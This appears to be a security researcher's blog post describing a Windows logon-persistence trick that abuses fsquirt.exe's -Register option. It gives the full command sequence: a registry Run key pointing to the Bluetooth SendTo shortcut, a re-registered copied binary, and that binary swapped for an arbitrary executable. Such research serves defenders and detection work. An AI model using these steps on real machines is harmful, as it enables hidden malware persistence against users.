The program in the title of this post is not very well-known. It’s being used for some random Bluetooth stuff that not too many PC users care about (okay, it’s a bit of a stretch, but I guess it’s really not very well-known).

How do you make a use of a binary no one cares about?

When I first looked at fsquirt.exe‘s command line arguments, I immediately thought of using it in my Beyond Good Ol’ Run key series as it was really a perfect candidate – until I discovered that despite behaving in a predictable way, delivering what I needed it to, I could not write the new post in that series, because the intended trick simply didn’t work.

I know it sounds dramatic, but this is a nature of the research.

I still wanted to make a triumph of the discovery though, so here we are…

When you run fsquirt.exe with the -Register argument it will create a LNK file c:\Users\<user>\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK that will lead Explorer to add the following item under your Send To Explorer submenu:

Running it with -UnRegister argument will remove this entry.

But here’s the secret…

Run:

c:\windows\System32\fsquirt.exe -Register

To ensure that this LNK file is created:

c:\Users\<user>\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK

Add a legitimate Run entry pointing to the LNK created in last step:

reg add "hkcu\software\microsoft\windows\currentversion\run" /v foo /d "c:\Users\<user>\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK"

Copy c:\windows\System32\fsquirt.exe to a different folder f.ex. c:\test by running a command like this:

copy c:\windows\System32\fsquirt.exe c:\test

Re-register it to a different location:

c:\test\fsquirt.exe  -Register 

This will overwrite the LNK file above to point to c:\test\fsquirt.exe.

Overwrite c:\test\fsquirt.exe with any executable of your choice – now you have an executable that will run anytime user logs on.

It’s a classic bait and switch.